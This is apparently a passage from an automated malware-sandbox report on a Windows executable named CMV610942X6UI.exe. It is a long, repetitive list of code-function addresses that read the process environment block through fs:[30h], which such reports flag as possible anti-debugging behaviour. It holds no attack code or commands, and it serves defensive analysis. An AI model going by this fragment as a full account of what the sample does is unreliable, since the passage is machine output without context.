Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h] 3_2_00FAE443
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA430 mov eax, dword ptr fs:[00000030h] 3_2_00FAA430
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6C427 mov eax, dword ptr fs:[00000030h] 3_2_00F6C427
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h] 3_2_00F6E420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h] 3_2_00F6E420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h] 3_2_00F6E420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h] 3_2_00FF6420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h] 3_2_00FA8402
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h] 3_2_00FA8402
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h] 3_2_00FA8402
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F725E0 mov eax, dword ptr fs:[00000030h] 3_2_00F725E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC5ED mov eax, dword ptr fs:[00000030h] 3_2_00FAC5ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC5ED mov eax, dword ptr fs:[00000030h] 3_2_00FAC5ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 3_2_00F9E5E7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F765D0 mov eax, dword ptr fs:[00000030h] 3_2_00F765D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA5D0 mov eax, dword ptr fs:[00000030h] 3_2_00FAA5D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA5D0 mov eax, dword ptr fs:[00000030h] 3_2_00FAA5D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE5CF mov eax, dword ptr fs:[00000030h] 3_2_00FAE5CF
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE5CF mov eax, dword ptr fs:[00000030h] 3_2_00FAE5CF
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F945B1 mov eax, dword ptr fs:[00000030h] 3_2_00F945B1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F945B1 mov eax, dword ptr fs:[00000030h] 3_2_00F945B1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102A456 mov eax, dword ptr fs:[00000030h] 3_2_0102A456
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 3_2_00FF05A7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 3_2_00FF05A7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 3_2_00FF05A7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE59C mov eax, dword ptr fs:[00000030h] 3_2_00FAE59C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA4588 mov eax, dword ptr fs:[00000030h] 3_2_00FA4588
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F72582 mov eax, dword ptr fs:[00000030h] 3_2_00F72582
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F72582 mov ecx, dword ptr fs:[00000030h] 3_2_00F72582
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h] 3_2_00FA656A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h] 3_2_00FA656A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h] 3_2_00FA656A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102A49A mov eax, dword ptr fs:[00000030h] 3_2_0102A49A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78550 mov eax, dword ptr fs:[00000030h] 3_2_00F78550
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78550 mov eax, dword ptr fs:[00000030h] 3_2_00F78550
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h] 3_2_00F9E53E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h] 3_2_00F9E53E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h] 3_2_00F9E53E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h] 3_2_00F9E53E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h] 3_2_00F9E53E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h] 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 3_2_00FEE6F2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 3_2_00FEE6F2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 3_2_00FEE6F2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 3_2_00FEE6F2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF06F1 mov eax, dword ptr fs:[00000030h] 3_2_00FF06F1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF06F1 mov eax, dword ptr fs:[00000030h] 3_2_00FF06F1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h] 3_2_00FAA6C7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA6C7 mov eax, dword ptr fs:[00000030h] 3_2_00FAA6C7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA66B0 mov eax, dword ptr fs:[00000030h] 3_2_00FA66B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC6A6 mov eax, dword ptr fs:[00000030h] 3_2_00FAC6A6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74690 mov eax, dword ptr fs:[00000030h] 3_2_00F74690
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74690 mov eax, dword ptr fs:[00000030h] 3_2_00F74690
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA2674 mov eax, dword ptr fs:[00000030h] 3_2_00FA2674
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101678E mov eax, dword ptr fs:[00000030h] 3_2_0101678E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA660 mov eax, dword ptr fs:[00000030h] 3_2_00FAA660
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA660 mov eax, dword ptr fs:[00000030h] 3_2_00FAA660
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010247A0 mov eax, dword ptr fs:[00000030h] 3_2_010247A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8C640 mov eax, dword ptr fs:[00000030h] 3_2_00F8C640
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA6620 mov eax, dword ptr fs:[00000030h] 3_2_00FA6620
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA8620 mov eax, dword ptr fs:[00000030h] 3_2_00FA8620
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7262C mov eax, dword ptr fs:[00000030h] 3_2_00F7262C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E627 mov eax, dword ptr fs:[00000030h] 3_2_00F8E627
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2619 mov eax, dword ptr fs:[00000030h] 3_2_00FB2619
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h] 3_2_00F8260B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE609 mov eax, dword ptr fs:[00000030h] 3_2_00FEE609
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F747FB mov eax, dword ptr fs:[00000030h] 3_2_00F747FB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F747FB mov eax, dword ptr fs:[00000030h] 3_2_00F747FB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h] 3_2_00F927ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h] 3_2_00F927ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h] 3_2_00F927ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFE7E1 mov eax, dword ptr fs:[00000030h] 3_2_00FFE7E1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7C7C0 mov eax, dword ptr fs:[00000030h] 3_2_00F7C7C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF07C3 mov eax, dword ptr fs:[00000030h] 3_2_00FF07C3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F707AF mov eax, dword ptr fs:[00000030h] 3_2_00F707AF
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103866E mov eax, dword ptr fs:[00000030h] 3_2_0103866E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103866E mov eax, dword ptr fs:[00000030h] 3_2_0103866E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78770 mov eax, dword ptr fs:[00000030h] 3_2_00F78770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h] 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFE75D mov eax, dword ptr fs:[00000030h] 3_2_00FFE75D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70750 mov eax, dword ptr fs:[00000030h] 3_2_00F70750
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF4755 mov eax, dword ptr fs:[00000030h] 3_2_00FF4755
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2750 mov eax, dword ptr fs:[00000030h] 3_2_00FB2750
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2750 mov eax, dword ptr fs:[00000030h] 3_2_00FB2750
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA674D mov esi, dword ptr fs:[00000030h] 3_2_00FA674D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA674D mov eax, dword ptr fs:[00000030h] 3_2_00FA674D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA674D mov eax, dword ptr fs:[00000030h] 3_2_00FA674D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA273C mov eax, dword ptr fs:[00000030h] 3_2_00FA273C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA273C mov ecx, dword ptr fs:[00000030h] 3_2_00FA273C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA273C mov eax, dword ptr fs:[00000030h] 3_2_00FA273C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEC730 mov eax, dword ptr fs:[00000030h] 3_2_00FEC730
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC720 mov eax, dword ptr fs:[00000030h] 3_2_00FAC720
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC720 mov eax, dword ptr fs:[00000030h] 3_2_00FAC720
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70710 mov eax, dword ptr fs:[00000030h] 3_2_00F70710
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA0710 mov eax, dword ptr fs:[00000030h] 3_2_00FA0710
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC700 mov eax, dword ptr fs:[00000030h] 3_2_00FAC700
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC8F9 mov eax, dword ptr fs:[00000030h] 3_2_00FAC8F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAC8F9 mov eax, dword ptr fs:[00000030h] 3_2_00FAC8F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0100892B mov eax, dword ptr fs:[00000030h] 3_2_0100892B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9E8C0 mov eax, dword ptr fs:[00000030h] 3_2_00F9E8C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFC89D mov eax, dword ptr fs:[00000030h] 3_2_00FFC89D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70887 mov eax, dword ptr fs:[00000030h] 3_2_00F70887
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01014978 mov eax, dword ptr fs:[00000030h] 3_2_01014978
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01014978 mov eax, dword ptr fs:[00000030h] 3_2_01014978
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFE872 mov eax, dword ptr fs:[00000030h] 3_2_00FFE872
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFE872 mov eax, dword ptr fs:[00000030h] 3_2_00FFE872
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74859 mov eax, dword ptr fs:[00000030h] 3_2_00F74859
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F74859 mov eax, dword ptr fs:[00000030h] 3_2_00F74859
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA0854 mov eax, dword ptr fs:[00000030h] 3_2_00FA0854
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F82840 mov ecx, dword ptr fs:[00000030h] 3_2_00F82840
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010069C0 mov eax, dword ptr fs:[00000030h] 3_2_010069C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAA830 mov eax, dword ptr fs:[00000030h] 3_2_00FAA830
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov ecx, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h] 3_2_00F92835
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103A9D3 mov eax, dword ptr fs:[00000030h] 3_2_0103A9D3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFC810 mov eax, dword ptr fs:[00000030h] 3_2_00FFC810
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA29F9 mov eax, dword ptr fs:[00000030h] 3_2_00FA29F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA29F9 mov eax, dword ptr fs:[00000030h] 3_2_00FA29F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFE9E0 mov eax, dword ptr fs:[00000030h] 3_2_00FFE9E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 3_2_00F7A9D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA49D0 mov eax, dword ptr fs:[00000030h] 3_2_00FA49D0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101483A mov eax, dword ptr fs:[00000030h] 3_2_0101483A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101483A mov eax, dword ptr fs:[00000030h] 3_2_0101483A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF89B3 mov esi, dword ptr fs:[00000030h] 3_2_00FF89B3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 3_2_00FF89B3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 3_2_00FF89B3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h] 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F709AD mov eax, dword ptr fs:[00000030h] 3_2_00F709AD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F709AD mov eax, dword ptr fs:[00000030h] 3_2_00F709AD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006870 mov eax, dword ptr fs:[00000030h] 3_2_01006870
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006870 mov eax, dword ptr fs:[00000030h] 3_2_01006870
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFC97C mov eax, dword ptr fs:[00000030h] 3_2_00FFC97C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB096E mov eax, dword ptr fs:[00000030h] 3_2_00FB096E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB096E mov edx, dword ptr fs:[00000030h] 3_2_00FB096E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB096E mov eax, dword ptr fs:[00000030h] 3_2_00FB096E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h] 3_2_00F96962
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h] 3_2_00F96962
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F96962 mov eax, dword ptr fs:[00000030h] 3_2_00F96962
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF0946 mov eax, dword ptr fs:[00000030h] 3_2_00FF0946
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010408C0 mov eax, dword ptr fs:[00000030h] 3_2_010408C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF892A mov eax, dword ptr fs:[00000030h] 3_2_00FF892A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103A8E4 mov eax, dword ptr fs:[00000030h] 3_2_0103A8E4
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFC912 mov eax, dword ptr fs:[00000030h] 3_2_00FFC912
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F68918 mov eax, dword ptr fs:[00000030h] 3_2_00F68918
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F68918 mov eax, dword ptr fs:[00000030h] 3_2_00F68918
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE908 mov eax, dword ptr fs:[00000030h] 3_2_00FEE908
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEE908 mov eax, dword ptr fs:[00000030h] 3_2_00FEE908
